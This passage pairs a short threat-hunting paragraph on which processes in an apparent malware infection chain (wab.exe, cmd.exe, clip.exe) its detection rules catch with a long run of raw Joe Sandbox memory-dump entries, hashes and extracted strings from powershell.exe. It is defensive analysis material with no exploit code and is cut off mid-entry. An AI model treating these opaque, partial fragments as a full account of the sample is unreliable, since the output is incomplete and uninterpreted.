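Run stand-alone, the hunt flags the cmd.exe echo (Target 7), both wab.exe instances as having a non-shell parent, and the nPzDKsDmTWqJ.exe process both as a wab.exe child and as a binary in a generated folder, while explorer.exe, rundll32.exe and firefox.exe stay quiet. clip.exe is not caught by any of these rules; catching it requires either memory-scan telemetry (the Yara hits in the report) or a rule that propagates suspicion down the tree from an already flagged parent.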
                    Memory Dump Source
                    • Source File: 00000002.00000002.2795270333.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7dcb68b621daf204e9446ed0f7cab4247ce7d745a814a54dfa0b8455242acf87
                    • Instruction ID: fb05b45dbbfe85e0341d1b4a8bfb8712415cb968bb3ae99d2f24a32464f65b1d
                    • Opcode Fuzzy Hash: 7dcb68b621daf204e9446ed0f7cab4247ce7d745a814a54dfa0b8455242acf87
                    • Instruction Fuzzy Hash: ACF1923091CA8D8FEBA8EF28C8557E937E1FF54350F04426EE84DC7295DB3899458B86
                    Memory Dump Source
                    • Source File: 00000002.00000002.2795270333.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 098a5d2f7a1d532c105757f044bcaea1075e71f6e63d338381489794684351b2
                    • Instruction ID: 3ba848a71f8775bdc4f6e841058003a870679a51eefd30aa01d7f521071d802d
                    • Opcode Fuzzy Hash: 098a5d2f7a1d532c105757f044bcaea1075e71f6e63d338381489794684351b2
                    • Instruction Fuzzy Hash: CFE1B13090CA8D8FEBA8EF28C8557E977E1FF54350F04426AD84DC7291DF78A9558B82
                    Memory Dump Source
                    • Source File: 00000002.00000002.2796134007.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 35172819eac07f255d8f265d0da321851fe2811a3467f46f8c05de97eff721c8
                    • Instruction ID: b779ba18e7c7d597b4430a5bc30839c2cb667792bbcf5b0186dd4d160c1bd2fd
                    • Opcode Fuzzy Hash: 35172819eac07f255d8f265d0da321851fe2811a3467f46f8c05de97eff721c8
                    • Instruction Fuzzy Hash: 99D1E432E1EACA4FEBA5AE2C68552B87BE1EF95690B0800FBC04DC7193ED1CDC458351
                    Memory Dump Source
                    • Source File: 00000002.00000002.2796134007.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ab341864b819a306d500a1293a2ed24fa9afae0ec4779b7879f5171169bb4f81
                    • Instruction ID: 5ed53bca71e5b8d48fa145d54a45d6aff4e226f1097751e90da38179f1984f11
                    • Opcode Fuzzy Hash: ab341864b819a306d500a1293a2ed24fa9afae0ec4779b7879f5171169bb4f81
                    • Instruction Fuzzy Hash: 84D14771D0DACA4FEBA5EF28A8656B977E2EF55750F1402FAD00DD31D2EE28E8408341
                    Memory Dump Source
                    • Source File: 00000002.00000002.2796134007.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 764544546b6dcbdce41956581792859a9415c4fd36021634f348d4380f4fb72d
                    • Instruction ID: 465d0c019946c1b9c31aedf6ee13be9d98664858499b8c0f102b23a2558adeaa
                    • Opcode Fuzzy Hash: 764544546b6dcbdce41956581792859a9415c4fd36021634f348d4380f4fb72d
                    • Instruction Fuzzy Hash: 8D41F772D1EACB4FFBA5EF28646527866E2EF45694F5802F9D01CE71D2EE1CE8448301
                    Memory Dump Source
                    • Source File: 00000002.00000002.2796134007.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e43496eebcc2945cee5c4e046f1c7328d27a6850291b12677cd675a3beecf993
                    • Instruction ID: 5413d5e2b3a87180d22700832da762fe63e63f7d9974a5cab1b89f55547738a1
                    • Opcode Fuzzy Hash: e43496eebcc2945cee5c4e046f1c7328d27a6850291b12677cd675a3beecf993
                    • Instruction Fuzzy Hash: A131A322D1EADB5FF7B9AA282C1627866D1EF85790F5801FAD40DD31D2FE0CE8048356
                    Memory Dump Source
                    • Source File: 00000002.00000002.2795270333.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                    • Instruction ID: 5581c1bbeeb35668f75aff93aa97cf07b4c35495046711a11288b2c77098a6b1
                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                    • Instruction Fuzzy Hash: 4001677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b1a6743d8db3a2e881d6fb29fd80fbc32737bf973302d363e170c01b55b09794
                    • Instruction ID: 1d40f0f43c0833db0728fca7f858f226260eaf6b54fb8acec5279da98f8ad3cd
                    • Opcode Fuzzy Hash: b1a6743d8db3a2e881d6fb29fd80fbc32737bf973302d363e170c01b55b09794
                    • Instruction Fuzzy Hash: 72B14170E10209DFDF14CFA9D9857DDBBF2AF88304F148529D825E7264EB74A846CB85
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ffce6b248d2d3c2caf3b93d8fb2a6a9630eac778fd262cb3a1c70d4cd563e374
                    • Instruction ID: 11369afaf730674a7e383dca8f9d1dd542231a4560175e332a57ab77f30c9596
                    • Opcode Fuzzy Hash: ffce6b248d2d3c2caf3b93d8fb2a6a9630eac778fd262cb3a1c70d4cd563e374
                    • Instruction Fuzzy Hash: DBB16F70E00209CFDF14CFA9C9957DDBBF2AF88354F148529D825E72A4EB74A846CB85
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-1910532044
                    • Opcode ID: 4c98e8c1d930a71e6839f64a4682086d7ad74faed24abfd6199d173585748041
                    • Instruction ID: e26211b12255c724d02cc2cef7dc2cc1a6732d164d2d4d50924c4b97b2e6d40c
                    • Opcode Fuzzy Hash: 4c98e8c1d930a71e6839f64a4682086d7ad74faed24abfd6199d173585748041
                    • Instruction Fuzzy Hash: 0E916B32F002049FDB658F68C4507AABBA7EF85310F18C56ADA569F251CB31EA45C7E1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                    • API String ID: 0-471056614
                    • Opcode ID: 272d36c7269a511e5f22668714ec6cd84dd9eaef340f23700802678509252607
                    • Instruction ID: b5237c14385a4169e5476b044d96a854ce8afd3b69cb3fb72d9ccc34f983e797
                    • Opcode Fuzzy Hash: 272d36c7269a511e5f22668714ec6cd84dd9eaef340f23700802678509252607
                    • Instruction Fuzzy Hash: 43D1CF34E002048FCB58DBA8C555B9EBBB3AF88344F19C819D5156F396CB76EC46CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                    • API String ID: 0-471056614
                    • Opcode ID: 1c00511cbf2579d989dbb94715c521805351b602ae7a03a774ac5c399b0a5ea4
                    • Instruction ID: 5922b7d0ddc1df29d1418ee72a56251797eb4a07c63825c726ed1b38b874cb4a
                    • Opcode Fuzzy Hash: 1c00511cbf2579d989dbb94715c521805351b602ae7a03a774ac5c399b0a5ea4
                    • Instruction Fuzzy Hash: B6D18134A002149FDB54DB98C991B9EBBB2FF84304F148499D5096F395CB36AD86CBA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    • Opcode ID: b7722f8aba4ec2f59974f9b8042f7730c961002b73db7478888a867bb5432c48
                    • Instruction ID: 5f0260fe1180fd16c6fa52a848f2f5ece4daa58a151efa5a91ec35dc150705b9
                    • Opcode Fuzzy Hash: b7722f8aba4ec2f59974f9b8042f7730c961002b73db7478888a867bb5432c48
                    • Instruction Fuzzy Hash: D5514B31E043449FCB66CF6CC8505667BF7AF82211B1C85A7D854CB152CB35E815C762
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q
                    • API String ID: 0-1785108022
                    • Opcode ID: 1f7352c09a62bdc1e1df6d409e687e19530a9f9c77ab048a5f31cff4d5d8af60
                    • Instruction ID: db15bce31798c1ac5f520fe16fd933dedcea7a91792fd47687aaf5c81035849e
                    • Opcode Fuzzy Hash: 1f7352c09a62bdc1e1df6d409e687e19530a9f9c77ab048a5f31cff4d5d8af60
                    • Instruction Fuzzy Hash: 66A14731F04204CFCBA4DFEC84556AA7BE7AFC6211B1880BAC519DB291DB76ED05C7A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: Haq$$]q$$]q
                    • API String ID: 0-1533201563
                    • Opcode ID: 499e4e6167553c76c14728da609740c421e28445f88faf4f398876298df63d49
                    • Instruction ID: 36b5405ae5442e3cf9bb501ca0286089a2a55046cf40001df7243abc21a46b57
                    • Opcode Fuzzy Hash: 499e4e6167553c76c14728da609740c421e28445f88faf4f398876298df63d49
                    • Instruction Fuzzy Hash: 47222B34B00214CFDB25DF65C894AAEB7B6AF89344F1540A9D81AAB361DF35AD81CF81
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q
                    • API String ID: 0-1444653880
                    • Opcode ID: a6c4c182d7bd9fe23e346d11976b4735394134b71beedb16d499096c645d2c6d
                    • Instruction ID: bc214279f8c3053e752d1388c7922dbc1a2bb4a04579583e219e042af862c973
                    • Opcode Fuzzy Hash: a6c4c182d7bd9fe23e346d11976b4735394134b71beedb16d499096c645d2c6d
                    • Instruction Fuzzy Hash: 8D917931F043048FCB659BF8885466A7BE7AF82200F1884AAD445CF2A6DF75ED45C7A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q
                    • API String ID: 0-705557208
                    • Opcode ID: 58ce1b25595f5d8a7d8fb3f223a4778580497f4d43c0e7da7ce7792a8402e4af
                    • Instruction ID: 8ca3943609ef9d9db08369ad9094e67e4c6301b5bbddc2df150fb133255310ed
                    • Opcode Fuzzy Hash: 58ce1b25595f5d8a7d8fb3f223a4778580497f4d43c0e7da7ce7792a8402e4af
                    • Instruction Fuzzy Hash: 5FB1AD34E00204DFDB58CBA8C541BAEBBB3AF88344F19C459D5156F396CB76E846CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q
                    • API String ID: 0-1444653880
                    • Opcode ID: d981f2239ee73a8c2fb1ade475e47b32c1c46e3003745ebfbafdc94d43ee1f97
                    • Instruction ID: db6ccb2114e447e77a964b35909ff94b41a1903141e95a73f1eaf746e0f862f4
                    • Opcode Fuzzy Hash: d981f2239ee73a8c2fb1ade475e47b32c1c46e3003745ebfbafdc94d43ee1f97
                    • Instruction Fuzzy Hash: C141C032F042148FC765D7B884016AABFE39F85311B1884BBD945DB252DB35ED02C7E2
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $]q$$]q$$]q
                    • API String ID: 0-182748909
                    • Opcode ID: 1239984b51c199e87e90065ecc51206751fb49d77fc9bc06659d797ba2071201
                    • Instruction ID: b0ad5e51c8fa1345d8a9eb29ccb4fd5e6617a663a2163b3959fc809c41bd84d1
                    • Opcode Fuzzy Hash: 1239984b51c199e87e90065ecc51206751fb49d77fc9bc06659d797ba2071201
                    • Instruction Fuzzy Hash: D6313C32B04205CFE765DA59D840967BBBBEFC1224B2CC56BE8558F291DF32E806C761
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q
                    • API String ID: 0-3120983240
                    • Opcode ID: a3f68aa6fa0b62746a4dd857fc6191ae49ab895e081193dac4d1e3f31eb3786d
                    • Instruction ID: 093b7ab5f02d96a51efb43d8c55e4fd0376345d98da5878babfca536bf41b1ac
                    • Opcode Fuzzy Hash: a3f68aa6fa0b62746a4dd857fc6191ae49ab895e081193dac4d1e3f31eb3786d
                    • Instruction Fuzzy Hash: 8B724C34E003088FDB94DB98C555A6ABBB3EF85304F25C469D9099F396CB72EC42CB91
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q
                    • API String ID: 0-3120983240
                    • Opcode ID: 951fa6479bd4f3f22dce18414893b38c7c73b085b344664e85376055540f38fa
                    • Instruction ID: 09febfd31e41207337e08e1d0be3aac9ac1aa41a482371308db46e815e56e0f2
                    • Opcode Fuzzy Hash: 951fa6479bd4f3f22dce18414893b38c7c73b085b344664e85376055540f38fa
                    • Instruction Fuzzy Hash: CCF1D534B002149FDB24DB68C951BAEBBB3EF84340F148499D5196F396CB72ED85CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q
                    • API String ID: 0-3120983240
                    • Opcode ID: 33b484b7ddb6e8519b35cccb0be87bc7cdf00a1915eb9489065b66e0e91beff6
                    • Instruction ID: b780701cf06daacf265b0cfbc73b54108662622f6524ad121758ea867fe87980
                    • Opcode Fuzzy Hash: 33b484b7ddb6e8519b35cccb0be87bc7cdf00a1915eb9489065b66e0e91beff6
                    • Instruction Fuzzy Hash: 33A13672F04201CFDBA69FA8840267A7BE39FC5215F1A84BAC405DF251DF35E946C7A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q
                    • API String ID: 0-1259897404
                    • Opcode ID: 3d9b6b77447cfb3244290932f4b12a3c21faa28c132fcaed2c1989981e812ddf
                    • Instruction ID: 143f316dc50961f32263ef3be1a8a467a9739275861d8ea238aae71424e2951b
                    • Opcode Fuzzy Hash: 3d9b6b77447cfb3244290932f4b12a3c21faa28c132fcaed2c1989981e812ddf
                    • Instruction Fuzzy Hash: 34424D34E00214CFDB94CB98C545A5ABBB3EF89304F28D599E9099F396CB72EC42CB51
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q
                    • API String ID: 0-1259897404
                    • Opcode ID: b785c370818887da2488e3a95f7f03964a916415699d8bb35d6080fc4090d46a
                    • Instruction ID: 2823d893f5a6dfd045e30aaf0a294bb20fc420b02a0c029b5e41752c285dad09
                    • Opcode Fuzzy Hash: b785c370818887da2488e3a95f7f03964a916415699d8bb35d6080fc4090d46a
                    • Instruction Fuzzy Hash: 73414631F04301CFCFA48FA48485B6A7BE3AF86344F1D84A5C8058B295DBB5E945C7A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: tP]q
                    • API String ID: 0-2175968468
                    • Opcode ID: ca71623da2b266a833a5be0c96fd7930781de401963ad08e81a249ddc9fc2447
                    • Instruction ID: 2fb3c7bdf640e4145323409c9af9324e76e8f67c0ffecb19515559d9039d334c
                    • Opcode Fuzzy Hash: ca71623da2b266a833a5be0c96fd7930781de401963ad08e81a249ddc9fc2447
                    • Instruction Fuzzy Hash: 52410830E062949FC761CB58C954A5ABFF2AF86700F1DC49AD4459F252C631EC46CBA1
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9ad2cabc9fdaa7eeafdbc035be3dfc0d363b1d6099b8a3da9bd211636da12875
                    • Instruction ID: ab9b85127867b0a056ebc0c5763b729d4884506589cb01bc6e228fc1ac1565f1
                    • Opcode Fuzzy Hash: 9ad2cabc9fdaa7eeafdbc035be3dfc0d363b1d6099b8a3da9bd211636da12875
                    • Instruction Fuzzy Hash: 3F121F34E00204CFDB94CB98C555A6ABBB3EF85304F29D459E9099F396CB72ED42CB91
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9600b2c188ef770325f256e1995a9ec4ad7e7501681fd63a5dfa69787888fa91
                    • Instruction ID: 19e776b7565348bce00a578114d332c933d84d29494c648950dab97a767b2f8e
                    • Opcode Fuzzy Hash: 9600b2c188ef770325f256e1995a9ec4ad7e7501681fd63a5dfa69787888fa91
                    • Instruction Fuzzy Hash: 84D10674A00208EFDB04DF98D584ADDBBB2FF88314F258599E815AB365D735ED82CB90
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 492bd9578504404d0ef0b175ea6c1bb2fbc0ea7259e3f9019cf6e65d5dcf1016
                    • Instruction ID: fd8b22604a414d248147422b98259d88a5b2fef4481ed28bc620df39a859d80c
                    • Opcode Fuzzy Hash: 492bd9578504404d0ef0b175ea6c1bb2fbc0ea7259e3f9019cf6e65d5dcf1016
                    • Instruction Fuzzy Hash: BFC1DE71A10208DFCB14DFA5C884A9DBBB6FF84300F158599E816AF265CB74ED89CF81
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 802bddafe2569dbbfcc41ddb92a2cd8089dbf658669902c29da271119df14718
                    • Instruction ID: 132c7df0f4618908a91774585981ba0a16fff5e82d635f643725cdd921f9e7b2
                    • Opcode Fuzzy Hash: 802bddafe2569dbbfcc41ddb92a2cd8089dbf658669902c29da271119df14718
                    • Instruction Fuzzy Hash: 88D1F474A00219EFDB14CF98D584AEDBBB2FF88310F258599E855AB365C731ED81CB90
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f45f7ac69a907f24ebe895a30de1c8ff26b74cbe7d5ba22e50a02254b7c6b797
                    • Instruction ID: c34f7f36fe3914a723dcf4f3df31751c44dde31a58ff4f3e0f72b16134a1f5f5
                    • Opcode Fuzzy Hash: f45f7ac69a907f24ebe895a30de1c8ff26b74cbe7d5ba22e50a02254b7c6b797
                    • Instruction Fuzzy Hash: 3BB172B0E10209DFDF10CFA9D9C57DDBBF1AF88304F148569E825A7264EB74A846CB85
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6ffd675f6d79d18197442e8ee44e7f9e85891c894c08bce58602a1f2348c43e3
                    • Instruction ID: 6235ef7fdee0c77656a394f3b51e717d2c19e3da72c67516deee1c79304a4cce
                    • Opcode Fuzzy Hash: 6ffd675f6d79d18197442e8ee44e7f9e85891c894c08bce58602a1f2348c43e3
                    • Instruction Fuzzy Hash: 79B17074E002049FDB54DBA8C555BAEBBB3EF89304F148564E805AF396CB76EC41CBA1
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d26149c2d50cc8e2cc6b9704d5827c100a10ffe19d896992f97c5d0f9093d861
                    • Instruction ID: 0715e28cf07b5ac8e0cc28edf8c8aa58366b8c7cc9ba4ff1252fbb9811637733
                    • Opcode Fuzzy Hash: d26149c2d50cc8e2cc6b9704d5827c100a10ffe19d896992f97c5d0f9093d861
                    • Instruction Fuzzy Hash: F0B17270E00209CFDB14CFA8C9D57DDBBF2AF48314F148529D829E7264EB74A846CB86
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a4facf3941c3265bb3ff9de431f99ca3015f371b0889ee525e2f0960550fe83b
                    • Instruction ID: 6db01c718127c94b123d3b87ddc483adb759e820600d1555b8157fd97e866573
                    • Opcode Fuzzy Hash: a4facf3941c3265bb3ff9de431f99ca3015f371b0889ee525e2f0960550fe83b
                    • Instruction Fuzzy Hash: 69918174E002049FDB54DB98C555BAEBBB3EF89304F148565E405AF392CB76EC41CBA1
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0668369f3cb99b16b3657683601f7e06e6feebabc046ecd658d7d9038e0bff25
                    • Instruction ID: 621869c7c7f67ac21b7e64207c61ed27eea222136ec8f3522d05bff81071457a
                    • Opcode Fuzzy Hash: 0668369f3cb99b16b3657683601f7e06e6feebabc046ecd658d7d9038e0bff25
                    • Instruction Fuzzy Hash: F7915675A00245CFCB05CF98C5D49EABBB1EF49310B25869AD865AB3A5C731FC91CBA0
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b875f0b5b2328a8eb043e76169a80358f837b1e179b96ee71ca7581cfcfdf72
                    • Instruction ID: 8835c781e7919667983d399f73607f7945b9eefc1b0b2f25d38c8159453b5271
                    • Opcode Fuzzy Hash: 5b875f0b5b2328a8eb043e76169a80358f837b1e179b96ee71ca7581cfcfdf72
                    • Instruction Fuzzy Hash: C5819E30A01244DFCB15DFA8D8849ADBBF2FF89354F1584AAE8159B361D735EC85CB50
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1184e4549826ff79f12ce656293574640d6c4c9bbc8d9ed6b11231a14a55e31a
                    • Instruction ID: 297c1fe154364b3136037fa1bf3e0ef8087d804e4806adbd1bdd8a67c58dc0cb
                    • Opcode Fuzzy Hash: 1184e4549826ff79f12ce656293574640d6c4c9bbc8d9ed6b11231a14a55e31a
                    • Instruction Fuzzy Hash: 80718E74E00204DFDB54DF98C591A6EBBB3EF88350F188469D815AB395DB32EC82CB91
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
